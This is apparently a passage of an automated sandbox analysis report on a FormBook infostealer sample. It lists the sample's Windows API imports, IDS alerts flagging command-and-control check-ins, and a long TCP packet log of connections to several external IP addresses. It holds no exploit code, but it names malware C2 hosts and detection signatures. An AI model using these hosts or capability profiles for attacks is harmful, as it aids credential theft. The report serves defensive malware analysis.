CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
            USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishGreat Britain

            Network Behavior

            Suricata IDS Alerts

            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
            2024-08-02T13:53:43.440829+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56451280192.168.2.6199.59.243.226
            2024-08-02T13:53:27.259778+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54977080192.168.2.6217.196.55.202
            2024-08-02T13:51:57.423849+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974480192.168.2.685.159.66.93
            2024-08-02T13:52:25.093527+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54975280192.168.2.615.197.172.60
            2024-08-02T13:54:27.403003+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56452380192.168.2.6154.215.72.110
            2024-08-02T13:53:05.503000+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54976680192.168.2.615.197.240.20
            2024-08-02T13:54:04.925630+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56451880192.168.2.672.52.178.23
            2024-08-02T13:52:38.434979+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54975880192.168.2.666.29.149.46
            2024-08-02T13:51:43.897495+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973880192.168.2.646.30.211.38
            2024-08-02T13:51:16.664024+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972680192.168.2.652.25.92.0
            2024-08-02T13:52:51.871610+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54976280192.168.2.6195.110.124.133
            2024-08-02T13:51:30.591363+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54973380192.168.2.6116.50.37.244
            2024-08-02T13:54:18.417842+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M56452280192.168.2.6194.67.71.191
            2024-08-02T13:50:17.693616+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54972080192.168.2.6154.215.72.110
            2024-08-02T13:52:11.078419+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M54974880192.168.2.691.195.240.94

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 2, 2024 13:50:52.791544914 CEST4972080192.168.2.6154.215.72.110
            Aug 2, 2024 13:50:52.803106070 CEST8049720154.215.72.110192.168.2.6
            Aug 2, 2024 13:50:52.803219080 CEST4972080192.168.2.6154.215.72.110
            Aug 2, 2024 13:50:52.805896044 CEST4972080192.168.2.6154.215.72.110
            Aug 2, 2024 13:50:52.810890913 CEST8049720154.215.72.110192.168.2.6
            Aug 2, 2024 13:50:52.810997009 CEST4972080192.168.2.6154.215.72.110
            Aug 2, 2024 13:50:52.812342882 CEST4972080192.168.2.6154.215.72.110
            Aug 2, 2024 13:50:52.815128088 CEST8049720154.215.72.110192.168.2.6
            Aug 2, 2024 13:50:52.816545963 CEST8049720154.215.72.110192.168.2.6
            Aug 2, 2024 13:50:52.817908049 CEST8049720154.215.72.110192.168.2.6
            Aug 2, 2024 13:51:08.199404955 CEST4972380192.168.2.652.25.92.0
            Aug 2, 2024 13:51:08.204755068 CEST804972352.25.92.0192.168.2.6
            Aug 2, 2024 13:51:08.204905987 CEST4972380192.168.2.652.25.92.0
            Aug 2, 2024 13:51:08.206670046 CEST4972380192.168.2.652.25.92.0
            Aug 2, 2024 13:51:08.211543083 CEST804972352.25.92.0192.168.2.6
            Aug 2, 2024 13:51:08.821131945 CEST804972352.25.92.0192.168.2.6
            Aug 2, 2024 13:51:08.821152925 CEST804972352.25.92.0192.168.2.6
            Aug 2, 2024 13:51:08.821165085 CEST804972352.25.92.0192.168.2.6
            Aug 2, 2024 13:51:08.821240902 CEST4972380192.168.2.652.25.92.0
            Aug 2, 2024 13:51:09.712790966 CEST4972380192.168.2.652.25.92.0
            Aug 2, 2024 13:51:10.730830908 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:10.735865116 CEST804972452.25.92.0192.168.2.6
            Aug 2, 2024 13:51:10.736015081 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:10.737643957 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:10.743295908 CEST804972452.25.92.0192.168.2.6
            Aug 2, 2024 13:51:11.366204977 CEST804972452.25.92.0192.168.2.6
            Aug 2, 2024 13:51:11.366221905 CEST804972452.25.92.0192.168.2.6
            Aug 2, 2024 13:51:11.366281986 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:11.367880106 CEST804972452.25.92.0192.168.2.6
            Aug 2, 2024 13:51:11.367937088 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:12.244117022 CEST4972480192.168.2.652.25.92.0
            Aug 2, 2024 13:51:13.262907028 CEST4972580192.168.2.652.25.92.0
            Aug 2, 2024 13:51:13.268115997 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.268230915 CEST4972580192.168.2.652.25.92.0
            Aug 2, 2024 13:51:13.270243883 CEST4972580192.168.2.652.25.92.0
            Aug 2, 2024 13:51:13.275175095 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.275291920 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.877974033 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.878010988 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.878022909 CEST804972552.25.92.0192.168.2.6
            Aug 2, 2024 13:51:13.878403902 CEST4972580192.168.2.652.25.92.0
            Aug 2, 2024 13:51:14.775264025 CEST4972580192.168.2.652.25.92.0
            Aug 2, 2024 13:51:15.794830084 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:15.800081015 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:15.800208092 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:15.802732944 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:15.807710886 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.663819075 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.663844109 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.664000034 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.664016008 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.664024115 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:16.664040089 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.664052963 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.664160013 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:16.664185047 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:16.665667057 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:16.665745020 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:16.667444944 CEST4972680192.168.2.652.25.92.0
            Aug 2, 2024 13:51:16.672296047 CEST804972652.25.92.0192.168.2.6
            Aug 2, 2024 13:51:22.056021929 CEST4972880192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:22.060987949 CEST8049728116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:22.061163902 CEST4972880192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:22.062978029 CEST4972880192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:22.067940950 CEST8049728116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:22.977735996 CEST8049728116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:22.978032112 CEST8049728116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:22.978143930 CEST4972880192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:23.572329044 CEST4972880192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:24.595668077 CEST4972980192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:24.603658915 CEST8049729116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:24.603902102 CEST4972980192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:24.605706930 CEST4972980192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:24.610567093 CEST8049729116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:25.497365952 CEST8049729116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:25.497595072 CEST8049729116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:25.497708082 CEST4972980192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:26.118961096 CEST4972980192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:27.137747049 CEST4973080192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:27.142713070 CEST8049730116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:27.142834902 CEST4973080192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:27.144884109 CEST4973080192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:27.149699926 CEST8049730116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:27.149866104 CEST8049730116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:28.047764063 CEST8049730116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:28.048738956 CEST8049730116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:28.048871994 CEST4973080192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:28.650190115 CEST4973080192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:29.668817043 CEST4973380192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:29.673779011 CEST8049733116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:29.673885107 CEST4973380192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:29.675618887 CEST4973380192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:29.682216883 CEST8049733116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:30.591144085 CEST8049733116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:30.591228008 CEST8049733116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:30.591362953 CEST4973380192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:30.594991922 CEST4973380192.168.2.6116.50.37.244
            Aug 2, 2024 13:51:30.599934101 CEST8049733116.50.37.244192.168.2.6
            Aug 2, 2024 13:51:35.634531975 CEST4973480192.168.2.646.30.211.38
            Aug 2, 2024 13:51:35.639712095 CEST804973446.30.211.38192.168.2.6
            Aug 2, 2024 13:51:35.639810085 CEST4973480192.168.2.646.30.211.38
            Aug 2, 2024 13:51:35.641633034 CEST4973480192.168.2.646.30.211.38
            Aug 2, 2024 13:51:35.646502018 CEST804973446.30.211.38192.168.2.6
            Aug 2, 2024 13:51:36.306050062 CEST804973446.30.211.38192.168.2.6
            Aug 2, 2024 13:51:36.306142092 CEST804973446.30.211.38192.168.2.6
            Aug 2, 2024 13:51:36.306209087 CEST4973480192.168.2.646.30.211.38
            Aug 2, 2024 13:51:37.150623083 CEST4973480192.168.2.646.30.211.38
            Aug 2, 2024 13:51:38.169984102 CEST4973580192.168.2.646.30.211.38
            Aug 2, 2024 13:51:38.175208092 CEST804973546.30.211.38192.168.2.6
            Aug 2, 2024 13:51:38.175365925 CEST4973580192.168.2.646.30.211.38
            Aug 2, 2024 13:51:38.177252054 CEST4973580192.168.2.646.30.211.38
            Aug 2, 2024 13:51:38.183023930 CEST804973546.30.211.38192.168.2.6
            Aug 2, 2024 13:51:38.848763943 CEST804973546.30.211.38192.168.2.6
            Aug 2, 2024 13:51:38.848823071 CEST804973546.30.211.38192.168.2.6
            Aug 2, 2024 13:51:38.848881960 CEST4973580192.168.2.646.30.211.38
            Aug 2, 2024 13:51:39.681627989 CEST4973580192.168.2.646.30.211.38
            Aug 2, 2024 13:51:40.706504107 CEST4973680192.168.2.646.30.211.38
            Aug 2, 2024 13:51:40.711807966 CEST804973646.30.211.38192.168.2.6
            Aug 2, 2024 13:51:40.711926937 CEST4973680192.168.2.646.30.211.38
            Aug 2, 2024 13:51:40.713829994 CEST4973680192.168.2.646.30.211.38
            Aug 2, 2024 13:51:40.718894005 CEST804973646.30.211.38192.168.2.6
            Aug 2, 2024 13:51:40.718981028 CEST804973646.30.211.38192.168.2.6
            Aug 2, 2024 13:51:41.360732079 CEST804973646.30.211.38192.168.2.6
            Aug 2, 2024 13:51:41.360774040 CEST804973646.30.211.38192.168.2.6
            Aug 2, 2024 13:51:41.360876083 CEST4973680192.168.2.646.30.211.38
            Aug 2, 2024 13:51:42.228338003 CEST4973680192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.247726917 CEST4973880192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.253107071 CEST804973846.30.211.38192.168.2.6
            Aug 2, 2024 13:51:43.253215075 CEST4973880192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.255455971 CEST4973880192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.268755913 CEST804973846.30.211.38192.168.2.6
            Aug 2, 2024 13:51:43.897175074 CEST804973846.30.211.38192.168.2.6
            Aug 2, 2024 13:51:43.897419930 CEST804973846.30.211.38192.168.2.6
            Aug 2, 2024 13:51:43.897495031 CEST4973880192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.903229952 CEST4973880192.168.2.646.30.211.38
            Aug 2, 2024 13:51:43.907998085 CEST804973846.30.211.38192.168.2.6
            Aug 2, 2024 13:51:49.048338890 CEST4973980192.168.2.685.159.66.93
            Aug 2, 2024 13:51:49.053858995 CEST804973985.159.66.93192.168.2.6
            Aug 2, 2024 13:51:49.053997040 CEST4973980192.168.2.685.159.66.93
            Aug 2, 2024 13:51:49.056546926 CEST4973980192.168.2.685.159.66.93
            Aug 2, 2024 13:51:49.062762022 CEST804973985.159.66.93192.168.2.6
            Aug 2, 2024 13:51:49.833924055 CEST804973985.159.66.93192.168.2.6
            Aug 2, 2024 13:51:49.834652901 CEST804973985.159.66.93192.168.2.6
            Aug 2, 2024 13:51:49.834727049 CEST4973980192.168.2.685.159.66.93
            Aug 2, 2024 13:51:50.572170019 CEST4973980192.168.2.685.159.66.93
            Aug 2, 2024 13:51:51.591703892 CEST4974080192.168.2.685.159.66.93
            Aug 2, 2024 13:51:51.596842051 CEST804974085.159.66.93192.168.2.6
            Aug 2, 2024 13:51:51.596926928 CEST4974080192.168.2.685.159.66.93
            Aug 2, 2024 13:51:51.599205017 CEST4974080192.168.2.685.159.66.93
            Aug 2, 2024 13:51:51.604127884 CEST804974085.159.66.93192.168.2.6
            Aug 2, 2024 13:51:52.351591110 CEST804974085.159.66.93192.168.2.6
            Aug 2, 2024 13:51:52.351722002 CEST804974085.159.66.93192.168.2.6
            Aug 2, 2024 13:51:52.351782084 CEST4974080192.168.2.685.159.66.93
            Aug 2, 2024 13:51:53.103462934 CEST4974080192.168.2.685.159.66.93
            Aug 2, 2024 13:51:54.122503996 CEST4974180192.168.2.685.159.66.93
            Aug 2, 2024 13:51:54.127401114 CEST804974185.159.66.93192.168.2.6
            Aug 2, 2024 13:51:54.127486944 CEST4974180192.168.2.685.159.66.93
            Aug 2, 2024 13:51:54.129615068 CEST4974180192.168.2.685.159.66.93
            Aug 2, 2024 13:51:54.135138035 CEST804974185.159.66.93192.168.2.6
            Aug 2, 2024 13:51:54.135348082 CEST804974185.159.66.93192.168.2.6
            Aug 2, 2024 13:51:54.910922050 CEST804974185.159.66.93192.168.2.6
            Aug 2, 2024 13:51:54.911834955 CEST804974185.159.66.93192.168.2.6
            Aug 2, 2024 13:51:54.915092945 CEST4974180192.168.2.685.159.66.93
            Aug 2, 2024 13:51:55.634829998 CEST4974180192.168.2.685.159.66.93
            Aug 2, 2024 13:51:56.657035112 CEST4974480192.168.2.685.159.66.93
            Aug 2, 2024 13:51:56.662291050 CEST804974485.159.66.93192.168.2.6
            Aug 2, 2024 13:51:56.665066004 CEST4974480192.168.2.685.159.66.93
            Aug 2, 2024 13:51:56.669017076 CEST4974480192.168.2.685.159.66.93
            Aug 2, 2024 13:51:56.673921108 CEST804974485.159.66.93192.168.2.6
            Aug 2, 2024 13:51:57.419544935 CEST804974485.159.66.93192.168.2.6
            Aug 2, 2024 13:51:57.423685074 CEST804974485.159.66.93192.168.2.6
            Aug 2, 2024 13:51:57.423849106 CEST4974480192.168.2.685.159.66.93
            Aug 2, 2024 13:51:57.429024935 CEST4974480192.168.2.685.159.66.93
            Aug 2, 2024 13:51:57.433996916 CEST804974485.159.66.93192.168.2.6
            Aug 2, 2024 13:52:02.457364082 CEST4974580192.168.2.691.195.240.94
            Aug 2, 2024 13:52:02.462425947 CEST804974591.195.240.94192.168.2.6
            Aug 2, 2024 13:52:02.462513924 CEST4974580192.168.2.691.195.240.94
            Aug 2, 2024 13:52:02.465368032 CEST4974580192.168.2.691.195.240.94
            Aug 2, 2024 13:52:02.470506907 CEST804974591.195.240.94192.168.2.6
            Aug 2, 2024 13:52:03.127219915 CEST804974591.195.240.94192.168.2.6
            Aug 2, 2024 13:52:03.127378941 CEST804974591.195.240.94192.168.2.6
            Aug 2, 2024 13:52:03.127511024 CEST4974580192.168.2.691.195.240.94
            Aug 2, 2024 13:52:03.978339911 CEST4974580192.168.2.691.195.240.94
            Aug 2, 2024 13:52:04.997303963 CEST4974680192.168.2.691.195.240.94
            Aug 2, 2024 13:52:05.002230883 CEST804974691.195.240.94192.168.2.6
            Aug 2, 2024 13:52:05.002345085 CEST4974680192.168.2.691.195.240.94
            Aug 2, 2024 13:52:05.007319927 CEST4974680192.168.2.691.195.240.94
            Aug 2, 2024 13:52:05.012214899 CEST804974691.195.240.94192.168.2.6
            Aug 2, 2024 13:52:05.676372051 CEST804974691.195.240.94192.168.2.6
            Aug 2, 2024 13:52:05.676594973 CEST804974691.195.240.94192.168.2.6
            Aug 2, 2024 13:52:05.676647902 CEST4974680192.168.2.691.195.240.94
            Aug 2, 2024 13:52:06.514225960 CEST4974680192.168.2.691.195.240.94
            Aug 2, 2024 13:52:07.529032946 CEST4974780192.168.2.691.195.240.94
            Aug 2, 2024 13:52:07.533920050 CEST804974791.195.240.94192.168.2.6
            Aug 2, 2024 13:52:07.537163019 CEST4974780192.168.2.691.195.240.94
            Aug 2, 2024 13:52:07.541042089 CEST4974780192.168.2.691.195.240.94
            Aug 2, 2024 13:52:07.545953989 CEST804974791.195.240.94192.168.2.6
            Aug 2, 2024 13:52:07.545980930 CEST804974791.195.240.94192.168.2.6
            Aug 2, 2024 13:52:08.218708038 CEST804974791.195.240.94192.168.2.6
            Aug 2, 2024 13:52:08.219093084 CEST804974791.195.240.94192.168.2.6
            Aug 2, 2024 13:52:08.219135046 CEST4974780192.168.2.691.195.240.94
            Aug 2, 2024 13:52:09.041032076 CEST4974780192.168.2.691.195.240.94
            Aug 2, 2024 13:52:10.060000896 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:10.066503048 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:10.066592932 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:10.068593025 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:10.074037075 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078265905 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078296900 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078310013 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078386068 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078397036 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078409910 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078418970 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.078422070 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078511953 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.078511953 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.078608036 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078624010 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078635931 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.078695059 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.083412886 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.106942892 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.106998920 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.107023001 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.150964975 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.176533937 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.176573038 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.176585913 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.176708937 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.176708937 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.176719904 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.176856995 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.176983118 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.177018881 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.177031994 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.177059889 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.177206039 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.177459955 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:11.177560091 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.183182001 CEST4974880192.168.2.691.195.240.94
            Aug 2, 2024 13:52:11.187962055 CEST804974891.195.240.94192.168.2.6
            Aug 2, 2024 13:52:16.452948093 CEST4974980192.168.2.615.197.172.60
            Aug 2, 2024 13:52:16.458431005 CEST804974915.197.172.60192.168.2.6
            Aug 2, 2024 13:52:16.458497047 CEST4974980192.168.2.615.197.172.60
            Aug 2, 2024 13:52:16.461445093 CEST4974980192.168.2.615.197.172.60
            Aug 2, 2024 13:52:16.467849970 CEST804974915.197.172.60192.168.2.6
            Aug 2, 2024 13:52:16.940391064 CEST804974915.197.172.60192.168.2.6
            Aug 2, 2024 13:52:16.940495968 CEST4974980192.168.2.615.197.172.60
            Aug 2, 2024 13:52:17.978394032 CEST4974980192.168.2.615.197.172.60
            Aug 2, 2024 13:52:17.983356953 CEST804974915.197.172.60192.168.2.6
            Aug 2, 2024 13:52:18.997442007 CEST4975080192.168.2.615.197.172.60
            Aug 2, 2024 13:52:19.002691984 CEST804975015.197.172.60192.168.2.6
            Aug 2, 2024 13:52:19.002785921 CEST4975080192.168.2.615.197.172.60
            Aug 2, 2024 13:52:19.005070925 CEST4975080192.168.2.615.197.172.60
            Aug 2, 2024 13:52:19.010021925 CEST804975015.197.172.60192.168.2.6
